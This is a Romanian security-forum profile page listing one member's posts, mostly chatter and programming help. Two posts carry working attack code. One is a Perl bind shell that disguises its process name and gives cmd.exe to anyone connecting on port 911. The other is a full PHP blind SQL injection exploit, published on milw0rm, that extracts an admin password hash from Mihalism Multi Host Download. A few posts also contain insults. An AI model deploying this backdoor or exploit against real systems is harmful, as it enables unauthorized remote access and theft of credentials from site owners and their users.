Jump to content

moubik

Active Members
  • Posts

    1261
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by moubik

  1. moubik

    PC hack

    da, sa foloseasca linux, sa aiba portul deschis, fara parola pe root. tu ce crezi ? fa niste presupuneri.
  2. degeaba faci box profesionist ca prin tcp/ip nimeni nu a reusit sa bata pe cineva. si sigur au fost multe tentative. ex1: aaa... scuze.. a reusit unu: http://au.answers.yahoo.com/answers2/frontend.php/question?qid=20070924052107AAvC0EO
  3. in caz ca nu stiai exploitul asta a fost deschi 10 zile. adica de la publicarea full disclosure pana cand a fost reparat.
  4. stii cumva cum e facut acel script ?
  5. trebuia sa spui ce folosesti ca sa nu ma faci curios. http://darkangelbvdesign.com/webmaster/utilitare/YID/nu_mai_sta_ascuns.php?id_mess= edit: alta problema. userul cu care stai logat pe win e "ge" ? n-am apucat sa pornesc programul. daca il incearca cineva si pare safe sa-mi zica si mie
  6. phreak se face cu programare dinamica (nu confundati cu alocare dinamica). se creaza un vector in care se salveaza in cate moduri s-a coborat pana la pozitia i si de fiecare daca se folosesc valorile intermediare. se poate intradevar si cu backtracking. daca accepti raspunsul (rezolvarea e mai elaborata si nu cred ca astepti sa-ti faca cineva problema asta), poate sa puna oricine intrebare, in afara de tine p.s. am avut in clasa a 9-a o problema asemanatoare la un concurs national bineinteles putin mai complexa (era un pot si unele trepte erau rupte)
  7. Salut. Daca te intereseaza partea de securitate ai ajuns bine
  8. 12 biti maxim. poti sa faci inmultirea direct intre 11111 si 1111111 = 111101100001 cum poti sa te aperi de atacuri DOS/DDOS ? ma refer bineinteles la servere.
  9. dranaxum, nu trebuie doar good coding, trebuie si uzabilitate
  10. sunt de acord cu ultilitatea VNC-ului. dar problema e ca de fiecare data cand vreau sa vad output-ul unei comenzi trebuie sa redirectionez stdout intr-un fisier. dupa care downloadez fisierul, vad ce scrie in el, dau urmatoarea comanda, redirect output in stdout ... mi se pare mai folositor urmatorul script: #!/usr/bin/perl use Socket; $port=911; $proto=getprotobyname('tcp'); $cmd="lpd"; $system='cmd.exe'; $0=$cmd; socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(SERVER, SOMAXCONN) or die "listen: $!"; for(;$paddr=accept(CLIENT, SERVER);close CLIENT) { open(STDIN, ">&CLIENT"); open(STDOUT, ">&CLIENT"); open(STDERR, ">&CLIENT"); system($system); close(STDIN); close(STDOUT); close(STDERR); } Plusuri +Stiu/Pot sa modific portul pe care asculta (in cazul in care esti in spatele unui NAT si vrei sa faci port forwarding) (intradevar pot si la serverul tau sa aflu care este portul, dar nu pot sa-l modific) +Imi face output in client la comenzi. +Este mai usor de folosit, deoarece nu am nevoie de client specific, pot folosi netcat, telnet. Minusuri: -Nu pot sa transfer fisiere Shell-ul acesta nu l-am facut eu, doar am modificat din /bin/sh in cmd.exe shell-ul prezentat aici de kuki. (daca nu vreti sa va faceti cont pentru a vedea threa-ul schimbati-va useragent-ul in "Googlebot/2.1 (+http://www.google.com/bot.html)")
  11. scuza-ma ca te intreb, care este utilitatea programului ?
  12. scuze, primul script pe care l-am postat nu e facut de mine si mi se parea ca face altceva uite unu special pt tine uite script in perl: reverse.pl #!/usr/bin/perl $file = $ARGV[0]; open (FILE, $file) || die ("could not read file"); @lines = <FILE>; foreach $line (@lines) { $line = reverse $line; print $line; } poti sa folosesti scriptul in genul asta perl reverse.pl fisierdeintrare.txt > fisierdeiesire.txt
  13. consider ca nu e nevoie sa dezmint. totusi pot sa tip mai tare decat el. daca vrea sa ne intrecem, ne intrecem verifica sfarsitul exploitului de pe milworm @katmai tu ai cumparat ceva de la alienware ?
  14. moubik

    Salut

    Daca tu vrei sa inveti mai multe, ce stii ?
  15. BA! Ca sa fie clar pentru toti. In unele locuri se face c++, in alte locuri nu se face c++ Borland Pascal NU este un limbaj de programare. Nu am nimic cu pascalul, chiar l-am folosit foarte mult. DAR GATA! Sa nu te mai aud ca-l recomanzi. Tu esti cam prost asa ? Se poate face asta cu cercurile si in brainfuck daca vrei lasa-ma in pace cu recomandarile tale Nu pot sa-ti dau ban, imi pare rau.
  16. Am pus un exploit pe milworm. http://milw0rm.com/exploits/5074 <?php /* ############################################################################### # # Moubik ( Romanian Security Team - [url]http://rstcenter.com[/url] ) presents # # Mihalism Multi Host Download - Blind SQL Injection Attack # # Thanks to Vladii for telling me about the CMS. # Thanks to Shocker for telling Vladii about the CMS. # # # Shoutz to Kw3rln, Bankai, Slick, Nemessis # Visit [url]http://rstcenter.com[/url] # Visit [url]http://websecurity.ro[/url] # # Ride as high as possible # # # Vulnerable Code is everywhere. # I'll talk about users.php # ###############################################################################* We have the code Line 107: $DB->query("SELECT * FROM `".SQL_USERS_TABLE."` WHERE `user_name` = '".$_POST['user_name']."'"); Line 112: $DB->query("INSERT INTO `".SQL_USERS_TABLE."` VALUES('', '".$_POST['user_name']."', '".md5($_POST['user_pass_1'])."', '', '".$_SERVER['REMOTE_ADDR']."', '".$_POST['user_email']."', '".$_POST['private']."', '".time()."', 'NORMAL', '".$_POST['country']."', '".$dob."', '".$_POST['gender']."')"); ............ I'll create the query for lost password. Click "Lost Password" and enter the SQL Injection in Username. The email address you could just leave it empty Injection: ' UNION SELECT IF ( SUBSTRING(password,1,1) = '1', BENCHMARK(2000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='1 The password is saved in hashed form so you only search for 0..9, a..f and you have the admin's hash This vulnerable code is: $DB->query("SELECT * FROM `".SQL_USERS_TABLE."` WHERE `user_name` = '{$_POST['username']}'"); So the query becomes: SELECT * FROM `mmh_user_data` WHERE `user_name` = '' UNION SELECT IF ( SUBSTRING(password,1,1) = '1', BENCHMARK(20000000, ENCODE('a','b')), 1 ) ,2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='1' Delay-ing the response if the first character of the admin's hash is equal to '1' */ function goto_help() { echo "-----------------------------------------------------------------------------------------\n"; echo "* Usage php ". $argv[0] ." [full_link] [userid] \n"; echo "* example:\n"; echo "* php ". $argv[0] ." [url]http://localhost/multihost/users.php?act=lost_password_go[/url] 1 \n"; echo "-----------------------------------------------------------------------------------------\n"; exit(); } $chars = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f'); $host = $argv[1]; $userid = (empty($argv[2]) == true ? 1 : $argv[2]); if (empty ($argv[1])) { goto_help(); } echo "---------------------------------------------------\n"; echo "Starting to exploit $host\n"; echo "Userid exploited is $userid\n"; echo "---------------------------------------------------\n"; $hash = ""; $conn = curl_init(); curl_setopt($conn, CURLOPT_POST, true); curl_setopt($conn, CURLOPT_URL, $host); curl_setopt($conn, CURLOPT_RETURNTRANSFER, true); for ($length = 1 ; $length <= 32 ; $length++) { for ($char = 0 ; $char <= 16 ; $char++) { $query = "' UNION SELECT IF ( SUBSTRING(password,". $length .",1) = '". $chars[$char] ."', BENCHMARK(20000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12 from mmh_user_data where user_id='". $userid; //echo $query ."\n"; $start = time(); $end = $start; curl_setopt($conn, CURLOPT_POSTFIELDS, 'username='. urlencode($query) .'&user_email=1'); curl_exec( $conn ); $end = time(); //if we have a hit if (($end - $start) > 5) { echo "possible hit for ". $chars[$char] ."\n"; $hash .= $chars[$char]; break; } else { echo $chars[$char]. " "; } } } echo "---------------------------------------------------\n"; echo "* Exploit made by Moubik\n"; echo "* Romanian Security Zone - http://rstcenter.com/\n"; echo "* esc6 esti un retardat\n"; echo "---------------------------------------------------\n"; echo "* Hash found for userid=". $userid . "\n"; echo "* hash=". $hash . "\n"; echo "---------------------------------------------------\n"; ?> # milw0rm.com [2008-02-06]
  17. cauta tutoriale pe net despre: -grafica in c++ -lucrul cu mouse-ul in c++ ar trebui sa contina si informatii despre event-uri (la apasarea click-ului sa identifice coordonatele) putina matematica ti-ar mai trebui, ca sa stii daca click-ul este in interiorul cercului sau in afara lui
×
×
  • Create New...